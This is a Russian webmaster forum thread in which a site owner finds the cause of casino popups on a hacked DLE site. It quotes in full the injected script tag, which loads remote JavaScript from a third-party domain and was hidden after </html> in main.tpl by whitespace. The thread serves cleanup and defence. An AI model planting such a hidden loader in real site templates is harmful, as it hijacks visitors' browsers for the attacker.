Как найти шпиона на сайте
Страницы: 1
Как найти шпиона на сайте, Взломали сайт на DLE 10.2
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.  

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?
Изменено: Юрий Д - 26 Января 2017 14:06
"ПисАть, как и пИсать, нужно, когда уже не можешь" М.М. Жванецкий.

Награды СССР

Комплексное SEO продвижение в поисковых системах Яндекс, Google

Цитата
Юрий Д пишет:
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?
Сделайте откат
WGN, откат, не получается, те бэкапы, которые сохранились, все уже с вредоносным кодом...

Поискал шпиона методом тыка: при замене файла main.tpl в шаблонах на чистый файл из дистрибутива, проблема исчезает - получается, что код в нём.
Но вот, найти не смог... Перерыл весь файл, ничего подозрительного не нашел.

Как хоть он должен выглядеть? Может кто-нибудь пример покажет?
можно адрес сайта?
vik1105, адрес у меня в подписи, нижний
в самом низу после </html> что это за скрипт? если не Ваш, то это он.
Цитата
<script async language="javascript" charset="UTF-8" type="text/javascript" src="rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi ( rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi )"></script>
vik1105, да, похоже, что это он и есть...
Изменено: Юрий Д - 27 Января 2017 13:59
удалите этот скрипт, и поставьте на будущее antishell.ru/]AntiShell Скрипт он будет контролировать все действия на сайте.
Всё, проблема устранена! ))) Код был замаскирован большим количеством пробелов. поэтому в окне редактирования и не был виден.
Всем огромное спасибо за помощь! Отдельный респект vik1105!
Этой маскировке три тысячи лет, но до сих пор работает )
Цитата
Юрий Д пишет:
Всё, проблема устранена!
возможно ненадолго, советую сменить все пароли от сайтов и хостинга проверить комп на троянов, могут заливать на хостинге
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
10:42 Bropush - твой бро в монетизации сайта push-уведомлениями 
09:51 PlayCash - партнерка для заработка на азартном трафике! 
23:09 Нормальный софт для накрутки ПФ в Яндекс 
20:13 R-money.ru Заработай на рефератах 
20:05 CPA-PRIVATE.BIZ - премиальная товарная программа. Только ТОП ставки! 
18:46 [b]Webvork [/b]- международная товарная СРА сеть с сертифицированными офферами на Европу. 
18:44 Turbobit.net - Официальная тема, Costaction ПП 
10:15 BestChange – обменивать электронную валюту можно быстро и выгодно 
09:23 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
23:36 CeshEX - Платформа автоматического обмена 
20:38 Продам 3 сайта + хостинг с рефералами 
20:30 Продвижение YouTube, Insta, TikTok, Teleg, ВК, Твитер, ФБ, ОД 
18:11 Letspay.me - Capitalist, BTC, ETH, USDT <=> Cash USD EUR UAH RUB, AUTO Visa MasterCard UAH RUB 
16:06 Oborot.net - обмен валют онлайн 
12:01 Суд запретил отцу-антиваксеру видеться с сыном 
11:58 20 000 000 просмотров за месяц 
16:27 Семилетняя россиянка заработала за год два миллиарда рублей 
11:22 Впервые в истории YouTube ролик собрал более 10 млрд просмотров 
21:19 37 противникам прививок от COVID грозят уголовные дела 
21:18 Моргенштерн объявил об открытии своего "свободного, честного и прогрессивного СМИ" 
15:11 Продвижение. Заработок. Можно ли продвинуться и заработать.